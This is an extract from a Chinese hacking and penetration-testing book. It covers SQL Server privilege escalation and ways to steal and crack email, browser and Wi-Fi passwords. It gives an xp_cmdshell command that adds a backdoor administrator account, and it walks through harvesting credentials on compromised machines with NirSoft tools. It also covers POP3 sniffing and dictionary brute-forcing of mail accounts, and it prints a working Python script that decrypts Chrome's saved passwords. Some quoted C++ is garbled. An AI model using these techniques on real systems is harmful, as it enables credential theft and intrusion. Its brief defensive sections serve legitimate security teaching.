”按钮添加用户。 图3-111 添加用户 02 将普通用户添加到管理员组 在“SQLExec”下拉列表中继续选择“XP_cmdshell exec”选项,然后将temp用户添加到管理员组,即运行命令“Exec master.dbo.xp_cmdshell 'net localgroup administrators temp /add '”,添加成功后如图3-112所示。 图3-112 添加temp用户为管理员 03 通过“XP_cmdshell exec”命令查看系统用户 在“SQLExec”下拉列表中选择“XP_cmdshell exec”选项,WebShell会自动给出脚本“Exec master.dbo.xp_cmdshell 'net user'”,如图3-113所示,单击“Query”按钮查询系统用户。如图3-114所示,temp用户已经添加到系统中。 图3-113 查看用户 图3-114 查看系统用户 04 登录远程终端 打开远程终端连接登录,输入IP地址及刚才添加的用户名和密码,如图3-115所示,成功进入服务器,其操作系统为Windows 2008 Server。 图3-115 成功进入服务器 3.13.7 小结 通过sa权限在SQL Server 2005中提权相对比较简单,这也是将WebShell权限提权到系统级别的一种思路。另外,通过数据库备份,将批处理命令备份到启动文件夹下,系统重启后就会自动执行批处理命令,也能达到提权的效果。 未知 第4章 电子邮件密码的获取与破解 目前有一种漏洞是通过渗透邮箱密码,在电子邮件中获取CMS系统密码和账号等敏感信息,进而利用这些信息渗透内部网络。对邮箱和邮件服务器的渗透是渗透中最有价值的,也是相对最难的。对公司系统而言,很多个人邮箱中都会保存公司无线网络、各种CMS系统的账号和密码、服务器管理员账号和密码,在运营人员的邮箱中可能还有整个网络的配置信息等。获取这些人员的邮箱密码,对渗透整个网络而言无疑是如虎添翼! 本章着重介绍邮箱密码的获取及渗透利用,包括如何获取Foxmail邮件,如何扫描POP3口令,如何使用工具软件直接获取本地保存的邮件账号和密码,最后还对电子邮件社会工程学攻击进行了探讨。 本章主要内容 Foxmail 6.0密码获取与嗅探 使用Hscan扫描POP3口令 使用Mail PassView获取邮箱账号和口令 使用MailBag Assistant获取邮件内容 电子邮件社会工程学攻击和防范 使用IE PassView获取网页及邮箱密码 Chrome浏览器存储密码获取技术及防范 使用EmailCrack破解邮箱口令 |
未知 4.1 Foxmail 6.0密码获取与嗅探 Foxmail 5.0邮件账号和密码的获取相对较简单,只要通过星号密码查看器即可查看保存在Foxmail软件中的用户密码,此外还有其他破解方式。但是,在Foxmail 6.0及之后的版本中,使用以上方法就无法获取其用户密码了。 那么,到底应该如何获取Foxmail 6.0及之后版本的账号和密码呢?通过研究,笔者发现至少有两种方法可以获取其账号和密码。一种方法是使用“月影”软件直接获取其密码,另外一种方法是使用Cain等嗅探工具配合Foxmail 6.0获取,下面详细介绍。 4.1.1 使用“月影”软件获取Foxmail 6.0密码及邮件资料 使用“月影”软件获取Foxmail 6.0密码及邮件资料的步骤如下。 01 获取邮件账号密码 运行月影Foxmail邮件转换/密码恢复器,选择Foxmail中需要破解的账号的Account.stg文件所在目录。选择完毕,会自动显示该邮件账号的相关信息,包括密码、POP3等,如图4-1所示。 02 获取邮件资料 在月影Foxmail邮件转换/密码恢复器主界面单击“Foxmail邮箱所在目录”设置框右边的浏览按钮,选择Foxmail邮箱所在目录,该目录是邮件账号的特定目录,即“mail”目录下的某个账号,如“someone@somemail.com”。选择正确后,会在该目录的*.box文件列表中显示邮箱,如图4-2所示。选择一个转换后的文件存储目录,单击“开始转换,并生成邮件列表”按钮,将邮件导出到本地目录。访问该目录,打开转换后的*.eml文件即可获得邮件资料。 图4-1 获取Foxmail邮件密码 图4-2 转换邮件到本地 03 验证邮件账号及密码 在浏览器中打开Web邮件登录地址,输入用户名和密码,成功进入该邮件账号。可以看到,该账号有589封邮件,如图4-3所示。 图4-3 验证邮件账号及密码 4.1.2 使用Cain软件获取Foxmail账号和密码 使用Cain软件获取Foxmail账号和密码的步骤如下。 01 安装并设置Cain软件 在本机安装Cain软件,安装完毕后需要安装WinPcap软件。运行Cain软件,然后单击菜单中的“Configure”选项,打开“Configuration Dialog”窗口,如图4-4所示,将“Options”设置区下的4个复选框全部选中,单击“确定”按钮完成设置。然后,在菜单中单击“Start sniffer”命令,开始监听。 图4-4 设置Cain软件 02 运行Foxmail 6.0软件获取邮件账号及密码 直接运行Foxmail 6.0软件,然后单击Foxmail中的“收取”按钮收取邮件,当Foxmail软件开始接收邮件时,单击“收取邮件”对话框中的“取消”按钮,取消邮件接收,如图4-5所示。 图4-5 收取邮件 在Cain中单击“Sniffer”标签页,在左侧列表中选择“POP3”选项,如图4-6所示,可以看到本地计算机上被监听的所有邮件账号和密码。 图4-6 查看被监听的邮件账号和密码 4.1.3 小结 在本次破解中,笔者先从网上搜集Foxmail账号破解方面的知识,然后通过不断搜索和整理,发现可用于破解邮件账号及密码的方法和工具。 Foxmail 6.0及以上版本改进了算法,修补了之前在密码保存方面的缺陷,破解时无法再通过星号密码查看器查看保存在软件中的密码了。但是,其密码在发送到POP3服务器进行验证的过程中仍然是明文,这就决定了邮件账号的安全问题没有得到实质上的解决,通过Cain等嗅探软件可以轻松获取经过该计算机的所有账号资料。 在网络攻防过程中,思维或者思路决定了最终的结果,思路一换天地宽。但这一切的前提条件就是基础,即要有扎实的理论和实践基础。 |
未知 4.2 使用Hscan扫描POP3口令 现在,很多邮箱服务器都支持POP3功能,通过POP3收取信件,收取信件时仅仅需要提供用户名和密码。目前有很多工具可以扫描POP3邮件的账号和口令,本例就通过Hscan扫描POP3账号进行攻击,获取POP3的账号和口令后,可以查看和发送邮件,并利用社会工程学发送木马邮件等进行攻击。本例只讲解如何扫描POP3口令,有关社会工程学攻击的案例放在后面的章节讲解。 4.2.1 设置Hscan 在Hscan中分别设置起始和结束扫描POP3的IP地址,然后在扫描参数中选择扫描模块,设置完毕后,单击“menu”菜单中的“start”命令开始扫描。 4.2.2 查看扫描结果 扫描结束后,直接打开Hscan.log文件,在其中搜索“pop3scan”,找到结果后,记下账号、口令及对应的IP地址,如图4-7所示。 图4-7 查看POP3扫描结果 4.2.3 登录Webmail邮件服务器 在IE浏览器中输入上面的IP地址并打开网页,进入Webmail登录界面,输入用户名和密码,如图4-8所示。 技巧 扫描POP3账号和口令后,在浏览器中输入的IP地址有可能无法打开网页,这时可以借助Google等搜索引擎进行搜索,有时能够直接搜索出该IP地址所在的邮件服务器地址。 图4-8 登录Webmail邮件服务器 4.2.4 查看邮件 登录成功后,可以进行所有操作,包括查看邮件及发送邮件等,如图4-9所示。 图4-9 查看邮件 4.2.5 口令扫描安全解决方案 对于口令扫描的安全防范措施主要从以下几个方面来考虑。 设置强大的口令。口令中包含大小写字母、数字、特殊字符,口令位数不能低于8位。 安装防火墙软件。防火墙软件能够有效防范各种攻击扫描。 对于数据库服务器,建议采取信任网络连接,仅允许信任的IP地址访问数据库服务器,且在安全策略中设置端口过滤,采取最小端口开放原则。 定期执行安全检查。定期检查系统,查看系统中是否存在一些可疑的新文件,查看系统的各种日志文件,并给出相应的安全处理措施。 4.2.6 小结 本例主要利用Hscan扫描POP3账号和口令。在扫描POP3账号和口令时,只要知道用户账号,结合字典扫描出口令概率还是挺高的。扫描出账号和对应的口令后,使用它们进行登录。登录邮件服务器后,可以进行查看邮件、发送邮件及获取该账号的所有邮件内容等操作。如果这些邮件是办公邮件,那么从安全的角度来讲,容易造成邮件内容泄露,再配合社会工程学实施攻击,危害相当大。 未知 4.3 使用Mail PassView获取邮箱账号和口令 随着网络技术的发展,电子邮件已经成为人们生活中一个重要的组成部分,日常联系和工作中的许多事情都是通过Email进行信息交换的,因此,在个人电子邮箱中极有可能保存着一些重要的信息——只要拥有邮箱账号和口令,在世界上任何一个地方,只要能够上网,均能获取该电子邮箱账号的邮件。 本案例使用Mail PassView在两种模式下获取邮件账号和密码。Mail PassView的下载地址为http://www.nirsoft.net/utils/mailpv.html。Mail PassView的最新版本为1.8.5,目前支持Outlook 2016的口令获取。 4.3.1 通过Radmin远程获取邮箱账号和密码 通过Radmin的文件传输功能将Mail PassView上传到安装有Radmin服务端的计算机上,然后选择Radmin的完全控制功能,进入完全控制模式。运行Mail PassView,其结果如图4-10所示,可以很清楚地看到“Name”、“Email”、“Server”、“User”、“Password”等关于电子邮件的详细信息。 图4-10 通过Radmin获取邮箱账号和口令 4.3.2 通过远程终端获取邮箱账号和密码 登录远程终端的桌面以后,通过VBS脚本或者远程控制软件将Mail PassView上传到远程终端,然后运行Mail PassView,即可获取系统中存在的邮箱账号和口令,如图4-11所示。 图4-11 通过远程终端获取邮箱账号和口令 说明 (1)可以直接通过Mail PassView将获取的邮箱账号和密码保存为一个文件。选中所有记录,依次选择“File”→“Save Selected Item”选项,将所有信息保存为一个TXT文件。保存完毕后可以很方便地查看“Name”、“Email”、“Server”、“User”、“Password”等关于电子邮件的详细信息。 (2)Mail PassView需要在图形界面下执行,不能在DOS或者反弹的Shell中执行。 |
C:\Documents and Settings\simeon\Local Settings\Application Data\Identities C:\Documents and Settings\simeon\Local Settings\Application Data\Identities\{A17F510D- 109E-4006-B460-73E3EB971094} C:\Documents and Settings\simeon\Local Settings\Application Data\Identities\{A17F510D- 109E-4006-B460-73E3EB971094}\Microsoft\Outlook Express 注意 (1)在覆盖原有文件前,一定要对其进行备份,或者直接复制原有文件到一个新文件夹中,防止在覆盖文件后对原有系统造成破坏。 |
如果用户名为“Administrator”,则文件对应位置应该为“C:\Documents and Settings\Administrator\Application Data\Identities\{4424572C-E99E-4523-B33D-A0AB0C29E874}”。 |
2.使用Outlook Express导入文件进行恢复 打开Outlook Express程序,依次单击“文件”→“导入”→“邮件”选项,在“Outlook Express导入”窗口选择要导入电子邮件程序的来源,如图4-12所示,选择“Microsoft Outlook Express 6”选项,然后单击“下一步”按钮。 图4-12 选择要导入电子邮件的来源 说明 Outlook Express是默认安装在系统中的,如果程序菜单中没有Outlook Express,可以到C:\Program Files\Outlook Express目录下运行可执行文件msimn.exe进行启动。 |
4.4.2 使用Mailbag Assistant恢复邮件内容 下面介绍Mailbag Assistant的相关内容。 1.Mailbag Assistant简介 Mailbag Assistant的最新版本是4.01,可以到http://www.onlinedown.net/softdown/ 5604_2.htm下载。 |
另外,虽然Mailbag Assistant的说明中并没有提到可以打开Outlook Express 5的邮件文件,但是笔者试用后发现Mailbag Assistant可以打开此类文件。 2.安装与设置Mailbag Assistant 将Mailbag Assistant下载到本地直接运行,安装过程非常简单,按照提示进行即可。 安装完成后运行Mailbag Assistant,会弹出向导要求用户进行设置,如图4-15所示,可以取消设置,也可以根据提示进行设置。 在本例中,直接打开Mailbox Assistant,如图4-16所示,选择邮件所在文件夹,可以看到一共有9个文件,可以选择一个或者多个文件然后打开。 图4-15 设置Mailbag Assistant 图4-16 选中邮件文件 说明 (1)Mailbag Assistant默认有31天免费使用期。 |
3.获取邮件内容 如果邮件文件没有损坏,则可以在Mailbag Assistant主窗口看到邮件的内容,其中包含邮件发送时间、发送者、邮件地址、主题、附件、文件名称等信息,如图4-17所示。 单击选中第1条记录,Mailbag Assistant主窗口下方会显示邮件的内容。 |
图4-17 显示邮件内容 4.导出邮件附件 在主窗口中选中有附件标识的邮件记录,单击鼠标右键,在弹出的快捷菜单中选择“Extract Attachments…”选项,如图4-18所示,然后选择一个导出的目标文件夹。 图4-18 选择导出的目标文件夹 如果没有什么意外,就会出现一个导出信息对话框,如图4-19所示,表示有3个附件导出成功。 图4-19 附件导出成功提示信息 5.导出所有邮件 选中当前窗口中的所有邮件,依次选择“File”→“Export E-mail As”→“EML Files”选项,将邮件导出为 *.eml文件,如图4-20和图4-21所示。 |
图4-20 导出邮件文件 图4-21 成功导出的邮件 4.4.3 邮件内容防查看措施 对于邮件内容的防范措施,首先是加强个人计算机的安全措施,对一些涉及个人敏感信息的邮件妥善处理,如另外存为加密文件。 对一些账号开通等信息,应及时修改密码及个人资料,以防止入侵者或者他人在获取邮件内容后对这些信息进行利用。 |
未知 4.5 电子邮件社会工程学攻击和防范 社会工程学是信息网络安全的一个新的分支,其主要特点是利用人的弱点进行攻击。 在正面渗透越来越困难的情况下,黑客越来越多地借助社会工程学,包括国内出现的密码“泄露门”,以及安全界比较著名的APT攻击,都是典型的利用社会工程学进行攻击的案例。 |
本节从社会工程学攻击的现状出发,详细研究电子邮件社会工程学攻击的应用手段和方式,并在此基础上对电子邮件社会工程学攻击的防范措施进行研究和探讨,希望通过这些安全防范措施降低被成功攻击的概率。 |
根据中国互联网络信息中心的数据统计,我国上网用户已经超过5亿,手机上网用户超过3亿,一旦接入互联网,就会成为黑客攻击的目标。 国家互联网应急中心发布的《2011年中国互联网网络安全态势报告》指出:我国遭受境外网络攻击持续增多; |
在安全防范软件较为丰富的情况下,对个人主机渗透常用的方法就是电子邮件社会工程学攻击,个人计算机一旦被攻击者成功入侵,轻者个人资料泄露,如“艳照门”事件,重者国家机密泄露,给个人和国家带来损失。 现在,电子邮件已经成为个人工作和生活的重要组成部分,因此,防范针对个人发起的电子邮件攻击就非常有必要了。 目前,国内有关电子邮件社会工程学攻击的研究较少,而国外已经将电子邮件社会工程学攻击列为重要资讯部门必须培训的课程之一。 笔者通过走访黑客、查询国内外文献,对电子邮件社会工程学的手段、攻击方式进行了深入的研究。 |
1.社会工程学的定义 社会工程学(Social Engineering)是把对物的研究方法全盘运用到对人本身的研究上,并将其变成技术控制的工具。 社会工程学是一种通过对受害者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸如欺骗、伤害等危害手段而取得自身利益的方法。 2.社会工程学攻击 社会工程学攻击就是利用人们的心理特征,骗取用户的信任,获取机密信息、系统设置等不公开资料,为黑客攻击和病毒感染创造有利条件。 |
网络安全往往容易被入侵者从内部攻破,而利用社会工程学进行网络攻击,有点像电影或者小说中的“卧底”,在获取足够有用的信息后成功攻破网络。 |
由于安全产品的技术越来越完善,使用这些技术的人就成为整个环中最为脆弱的部分,加之人类具有贪婪、自私、好奇、信任等心理弱点,因此,通过恰当的方法和方式,入侵者完全可以从相关人员那里获取入侵所需的信息。 |
运用社会工程学进行网络攻击,可以使网络攻击者不需要付出很大的代价就达到他们所要达到的目的,所以被越来越多的攻击者所青睐。 4.5.2 常见的电子邮件社会工程学攻击方法 通过电子邮件进行攻击的常见手法主要有5种,分别是伪造邮件地址或者信任关系攻击、人性心理弱点攻击、恶意攻击、0day攻击和跨站攻击。 1.伪造邮件地址或者信任关系攻击 伪造攻击主要通过事先收集被攻击对象的各种信息,特别是有电子邮件往来的各种信息,然后假冒“信任”的联系人给被攻击对象发送邮件,被攻击者收到邮件后,看到是“信任”的关系,因此不加怀疑地直接打开邮件附件,或者回复攻击者想获取的信息。 |
2.人性心理弱点攻击 心理弱点攻击是电子邮件社会工程学攻击最主要的手法之一,该攻击方法利用电子邮件夹带恶意程序或恶意链接进行攻击,运用各种人性弱点吸引使用者开启问题邮件,问题邮件通常与被攻击者的兴趣有关,利用人的贪心等使被攻击对象无法对问题邮件免疫。 |
3.恶意攻击 攻击者通过发送捆绑木马的附件或者链接地址(链接地址往往带有挂马功能),诱使用户打开附件或者访问恶意构建的网页,从而感染病毒。 4.0day攻击 只要是软件,就可能存在有漏洞,未能及时修补就可能遭到利用并被入侵。 |
在软件漏洞点修补前出现的针对该漏洞的攻击行为称为零时差攻击(0day攻击)。 在软件漏洞更新补丁程序发布后的n天,利用用户还未修补的软件漏洞进行攻击,称为nday攻击。 |
攻击者通过0day漏洞交易渠道或者自己挖掘0day漏洞,掌握了一些文件格式的未公开漏洞,如Office系列、PDF系列、Flash系列及IE等,通过0day漏洞利用工具,将木马与0day漏洞捆绑在一起,生成一个正常格式的文件,被攻击者打开该文件后即感染木马或者执行指定的可执行文件。 |
5.电子邮件跨站攻击 跨站攻击,即“Cross Site Script Execution”(通常简写为“XSS”),是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上的、能够对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种操作或者对访问者进行病毒侵害的一种攻击方式。 |
攻击者通过对被攻击者电子邮件服务器所使用的系统进行研究,发现电子邮件服务器系统存在的各种跨站漏洞,然后将跨站漏洞利用代码嵌入富文本的邮件内容中,通过网页或者特定电子邮件发送软件,将构造好的邮件发送给被攻击者。 被攻击对象查看电子邮件时执行跨站代码,会要求重新输入用户名和密码。 攻击者通过事先构造好的电子邮件登录页面截获用户名和密码,然后将用户名和密码重新定向到真实的电子邮件地址,从而获取电子邮箱口令及Cookie等信息。 |
同时,还需要申请发送邮件时使用的电子邮件账号,通过模拟攻击对象的电子邮箱进行邮件发送测试,防止邮件不能通过邮件服务器安全策略被当成垃圾邮件处理的情况发生。 |
1.技术方面的防范 (1)安装杀毒软件和防火墙等安全防范软件 操作系统安装完成后,一定要安装杀毒软件和防火墙软件。 要养成定期杀毒的好习惯,对下载的邮件和软件均要进行杀毒,还要定期对系统进行杀毒。 (2)应用软件和安全防范软件更新 目前,Windows操作系统、应用软件和安全防范软件都会在一定程度上存在漏洞,如果网上已经公布了漏洞而用户未及时修补,就比较容易受到攻击。 因此,需要设置Windows操作系统自动更新系统补丁,更新Adobe Reader、Flash、IE等应用软件到最新版本或者下载补丁程序,每天更新杀毒软件病毒库。 (3)使用安全的邮件查看技术 在虚拟机中查看邮件,即使用目前的虚拟机技术,通过在物理机上安装VMware Workstation重新安装一个操作系统,所有邮件的查看操作均在虚拟机中进行,查看前要做快照,邮件处理完毕再使用快照恢复,这样,即使系统感染木马,也不会影响实体机。 使用不同的邮件查看软件时,应尽量熟悉所使用软件的基本设置,关闭自动下载图片和邮件预览功能,以纯文字方式打开邮件。 |
2.安全意识方面的防范 (1)警惕要求输入用户名和密码的页面 在电子邮件社会工程学攻击中,邮件跨站攻击是最常见和最有效的一种攻击方法。 |
(3)抵制“诱惑” 现代社会,信息极度丰富,多看原始网页的内容,针对“朋友”发送的电子邮件,不心动、不冲动,对自己感兴趣、内容有吸引力的邮件,要验明身份,特别是带有附件的邮件,要抵制“诱惑”,慎重打开。 |
4.5.5 小结 表面上看,电子邮件社会工程学攻击只是简单的欺骗,但是在网络安全领域,它的攻击效果往往是最显著的,究其原因是它包含了极其复杂的心理学因素,所以比其他入侵方式更难防范。 只要我们时刻提醒自己“攻击随时有可能在身边发生”,全面了解社会工程学的攻击方法和手段,具备一定的安全防范知识和防范措施,在面对社会工程学攻击的时候就能识别其真面目,处于主动地位,将遭受攻击的风险降至最低。 |
未知 4.6 使用IE PassView获取网页及邮箱密码 对于个人计算机来说,个人账号和密码是入侵者最为关心的事情,特别是邮件账号和网页账号——通过这些账号可以查看和获取用户的信息。在一般情况下,这些账号通常是通过键盘记录来获取的,但是键盘记录软件有时也会“怠工”,不会完整记录账号信息。如今越来越多的网站都采用了交互方式,且很多网站都有一定的权限保护机制,需要输入用户名和密码进行验证,验证成功后才能使用网站提供的资料和服务。在输入用户名和密码时,IE浏览器的高速缓冲存储器(Cache)会记录这些数据,而通过一些工具软件可以轻松地读取这些数据,也就意味着可以获取用户输入的账号和密码。下面对IE PassView进行介绍,然后给出一个使用IE PassView通过网页获取用户名和密码的案例。 4.6.1 IE PassView简介 IE PassView是Nir Sofer网站开发的一款功能强大、使用简单的网页密码获取软件,有关该软件的介绍请访问http://www.nirsoft.net/utils/internet_explorer_password.html。IE PassView的最新版本为1.32,下载地址为http://www.nirsoft.net/toolsdownload/iepv.zip。该软件属于获取密码类软件,因此可能会被杀毒软件查杀。 IE PassView是一个小巧的密码管理工具,它能获取互联网浏览器存储的密码,并允许删除其中保存的密码,它支持的浏览器版本从IE 4到IE 11。 4.6.2 获取保存的网页及邮箱密码 IE PassView是一个独立的可执行软件。直接运行该软件,会自动获取系统中所有通过浏览器访问的网页密码、访问地址、用户名、类型等信息,如图4-22所示。 图4-22 自动获取用户名称以及网页密码信息 IE PassView只能在GUI模式下执行,不能在反弹的DOSShell中执行。 4.6.3 对获取的信息进行处理 处理获取的信息有两种方式:一种是手工记录获取的用户网页密码及账号等信息;另外一种是直接通过IE PassView将获取的网页密码保存为一个文件。 在IE PassView中选中所有记录,依次选择“File”→“Save Selected Item”选项,将所有信息保存为一个TXT文件。保存后,我们可以直观、方便地查看密码、用户名、访问地址、类型等信息,如图4-23所示。 图4-23 处理获取的账号及密码等信息 4.6.4 小结 在用IE PassView获取的网页用户名和密码中,有一些是属于网站管理员的,因此可以通过这些信息继续渗透和控制网站。 可以在计算机上安装Radmin等远程控制软件,然后通过完全控制模式运行IE PassView程序,以快速获取计算机中的网页密码和用户名。 本节的案例很简单,通过在肉机上执行,就可以获取系统中存在的网页用户名和密码。此外,通过获取的信息还可以进行渗透和控制。 |
未知 4.7 Chrome浏览器存储密码获取技术及防范 用户在上网过程中使用最多的工具就是浏览器,目前主流的浏览器有IE、Chrome、Firefox,以及国内以360为代表的360浏览器(QQ浏览器、猎豹浏览器、百度浏览器)。 在使用浏览器访问网站时,有些浏览器会自动提示用户是否保存登录的用户名和密码,有些浏览器则需要设置是否自动保存登录密码。 |
例如,在办公室里,如果一个员工离开计算机时没有锁定屏幕,其他人可以使用该员工的计算机浏览器下载密码获取软件并运行,然后用手机拍下获取的密码,最后删除软件,清除痕迹,该员工的浏览器密码完全被他人窃取。 |
控制主机后,通过后台或者前台可以直接获取浏览器的密码。 4.7.1 使用WebBrowserPassView获取浏览器密码 下面介绍WebBrowserPassView的有关内容。 1.WebBrowserPassView简介 一看名字就可以知道,WebBrowserPassView是一款浏览器密码获取软件。 WebBrowserPassView的使用方法非常简单,启动后只要几秒,就能获取浏览器所记录的网址、账号及密码了。 WebBrowserPassView目前支持IE1~IE10、Firefox所有版本、Safari、Chrome及Opera等主流浏览器,其官方网站地址为http://www.nirsoft.net/utils/web_browser_ password.html,下载地址为http://www.nirsoft.net/toolsdownload/webbrowserpassview.zip。 2.使用WebBrowserPassView获取密码 下载WebBrowserPassView后直接解压,运行webbrowserpassview.exe,即可获取密码。 |
如图4-24 所示,会显示网址、浏览器类型、用户名、密码、创建时间等信息。 图4-24 获取浏览器保存的密码 双击某条记录,会显示该记录的详细信息,如图4-25所示。 |
图4-25 获取记录的详细信息 4.7.2 通过编写程序获取Chrome浏览器保存的密码 下面我们讨论通过编写程序获取Chrome浏览器中保存的密码的过程。 1.Chrome浏览器的密码存储机制 Chrome浏览器加密后的密钥存储于“%APPDATA%\..\Local\Google\Chrome\User Data\Default\Login Data”下的一个SQLite数据库中,这里的“APPDATA”是由系统或者用户环境变量决定的。 |
Provisional_save_manager_->SubmitPassed(); if (provisional_save_manager_->HasGeneratedPassword()) UMA_HISTOGRAM_COUNTS("PasswordGeneration.Submitted", 1); If (provisional_save_manager_->IsNewLogin() && !provisional_save_manager_ ->HasGeneratedPassword()){ Delegate_->AddSavePasswordInfoBarIfPermitted( Provisional_save_manager_.release()); } else { provisional_save_manager_->Save(); Provisional_save_manager_.reset(); } 当我们登录成功且使用的是一套新的证书时(也就是说,我们是第1次登录该网站),Chrome就会询问我们是否需要记住密码。 |
Bool Encrypt::EncryptString(const std::string& plaintext,std::string* ciphertext) { DATA_BLOB input; Input.pbData = static_cast<DWORD>(plaintext.length()); DATA_BLOB output; BOOL result = CryptProtectData(&input, L"",NULL, NULL, NULL, 0,&output); If (!result) Return false; //复制操作 Ciphertext->assign(reinterpret_cast<std::string::value_type*>(output.pbD ata); LocalFree(output.pbData); Return true; } 以上代码的最后利用了Windows API函数CryptProtectData(请记住这个函数,因为后面会提到它)来加密。 |
2.编写脚本获取Chrome浏览器保存的密码 因为考虑到在大多数情况下无法远程登录服务器去执行GUI程序,所以,做一个Python脚本是最佳选择,其唯一的缺点是如果Windows不支持Python环境,将Python程序打包成EXE文件的话,文件体积会比较大。 |
因为用户不同,文件夹就不同,我们需要知道LOGIN DATA文件的具体路径,所以,我们需要使用Python中的os.environ从环境变量中读取LOCALAPPDATA的路径,剩下的路径是谷歌默认生成的。 |
google_path = r' Google\Chrome\User Data\Default\Login Data' file_path = os.path.join(os.environ['LOCALAPPDATA'],google_path) #Login Data文件可以利用Python中的sqlite3库来操作 conn = sqlite3.connect(file_path) for row in conn.execute('select username_value, password_value, signon_realm from logins'): #利用Win32crpt.CryptUnprotectData对加密的密码进行解密操作 cursor = conn.cursor() cursor.execute('select username_value, password_value, signon_realm from logins') #接收全部返回结果 for data in cursor.fetchall(): passwd = win32crypt.CryptUnprotectData(data[1],None,None,None,0) #利用 win32crypt.CryptUnprotectData 解密后,通过输出 passwd 这个元组中的内容,可以 逐一得到Chrome浏览器存储的密码 这里用到了CryptUnprotectData函数,与之对应的是之前提到的CryptProtectData。 |
#coding:utf8 import os, sys import sqlite3 import win32crypt google_path = r'Google\Chrome\User Data\Default\Login Data' db_file_path = os.path.join(os.environ['LOCALAPPDATA'],google_path) conn = sqlite3.connect(db_file_path) cursor = conn.cursor() cursor.execute('select username_value, password_value, signon_realm from logins') #接收全部返回结果 for data in cursor.fetchall(): passwd = win32crypt.CryptUnprotectData(data[1],None,None,None,0) if passwd: print '-------------------------' print u'[+]用户名: ' + data[0] print u'[+]密码: ' + passwd[1] print u'[+]网站URL: ' + data[2] 运行以上脚本,效果如图4-26所示。 |
当然,在取得服务器WebShell的情况下,如果有执行权限但无法提权,可以利用这种方法挖掘密码,进而利用社会工程学思路对服务器的RDP服务密码进行暴力破解。 |
1.打造专用访问系统 现在,计算机的性能都很不错,可以在本机搭建虚拟机平台,单独用一台虚拟机来访问重要系统和重要网站。 也要为虚拟机设置系统访问口令,这样实体机即使未锁屏,其他人也不能快速获取其口令。 专机专用可以防止感染病毒及账号被盗。 |
未知 4.8 使用EmailCrack破解邮箱口令 在无法直接进行攻击时,邮件木马攻击及邮件账号破解攻击无疑是黑客的上佳选择。邮件木马攻击成功有两个必要条件:一是木马不被查杀,二是用户打开邮件并执行了隐藏在邮件中的木马程序。 随着用户网络安全意识的提高,邮件木马攻击的成功率已经大大降低。而通过成功破解邮件账号,黑客可以很方便地了解用户的行为、获取邮件中的资料、获取邮件主人的个人信息等。邮件账号破解一般有3种情况:第一种是用户自己忘记了邮箱密码,通过邮件服务器的“忘记密码”模块无法重新设置或者获取原密码;第二种是出于商业目的或者好奇,想知道对方邮件中内容,因此对邮件账号进行破解;第三种是专业性攻击,攻击邮箱以获取资料、掌握个人动态及获取个人信息等。本案例仅仅演示如何破解邮件账号。 4.8.1 通过邮件账号获取SMTP服务器地址 邮件账号“@”后的地址就是服务器地址的后缀。例如,邮件账号“vip2008@vip. sina.com”的邮件服务器地址是“vip.sina.com”,有些时候会在这些地址前加上“mail.”或者“webmail.”。如果能在IE浏览器中打开这些地址,说明该服务器是可用的。 打开邮件服务器的页面以后,通过其网页中的帮助等信息可以获取邮件运营商公开提供的SMTP和POP3服务器地址。如图4-27所示,新浪VIP邮箱的SMTP和POP3服务器地址分别是“smtp.vip.sina.com”和“pop3.vip.sina.com”。 对外提供免费/收费邮件服务的邮件运营商,一般都会在网站上提供邮件使用帮助信息,通过这些信息可以快速、准确地获取其SMTP和POP3邮件服务器的地址,这些信息往往与Foxmail和Outlook的设置有关。因此,查看Foxmail和Outlook的设置信息,即可获取邮箱的SMTP和POP3服务器地址信息。 图4-27 获取新浪VIP邮箱账号的SMTP和POP3服务器地址 4.8.2 运行EmailCrack 图4-28 运行EmailCrack 运行EmailCrack,如图4-28所示,默认提供了126.com邮件服务器的地址。在进行破解时,首先要选择或者设置邮件服务器的地址,然后要设置邮箱账号名。 说明 (1)邮箱账号名就是被破解的邮件账号。有的账号需要输入完整的电子邮件地址,有的只需要输入电子邮件地址中“@”前面的部分即可。 (2)EmailCrack是通过SMTP服务器来对邮件账号进行破解的,因此在破解时需要知道SMTP服务器的地址。如果使用POP3邮件破解软件,则需要知道POP3服务器的地址。 4.8.3 设置字典 图4-29 选择密码字典 单击“字典设置”按钮,选择一个密码字典。在EmailCrack中,密码字典文件是以“.dic”为后缀的文件。DIC文件可以通过专业的字典生成工具生成。 如图4-29所示,选择密码字典1.dic,单击“打开”按钮。 4.8.4 破解邮件账号 如图4-30所示,服务器地址为“smtp.126.com”,邮件账号为“bf**”,单击“开始扫描”按钮开始邮件账号的破解,在“扫描信息”区域会显示尝试的密码信息。 账号破解成功后会给出正确的密码,如图4-31所示。 图4-30 破解邮件账号 图4-31 破解得到的密码 说明 有些邮件服务器采取了安全措施,通过EmailCrack获取邮件账号的密码后,系统会限制用户在10分钟或者1小时内登录邮件服务器。 4.8.5 小结 邮件账号的破解过程非常简单,只需要知道邮件账号的SMTP服务器名称并选择一个字典文件即可。 邮件账号破解成功与否,主要取决于密码字典的强度高低和时间长短。在理论上,如果邮件服务器未做相应的防范措施,在足够长的时间内用户的账号是可以被破解的。因此,要防止邮件账号被破解,最好的方法就是设置一个足够强健的密码,让破解者花费1年甚至更长的时间都无法破解——笔者认为,很少有人会有这个耐心来破解这么强健的密码。 未知 第5章 无线网络密码的获取与破解 无线网络由于方便易用,不需要网线,因此大受欢迎。目前,基本上每一个上网家庭就是一个无线热点,办公场所、社区、机场、咖啡厅等公共区域也大量使用无线网络。而无线网络的使用最关键的一点是必须有无线密码。 本章着重介绍如何快速破解无线网络密码,以及在拥有权限的情况下如何获取被控制计算机的无线密码。 本章主要内容 使用CDlinux轻松破解无线网络密码 使用WirelessKeyView轻松获取无线网络密码 |
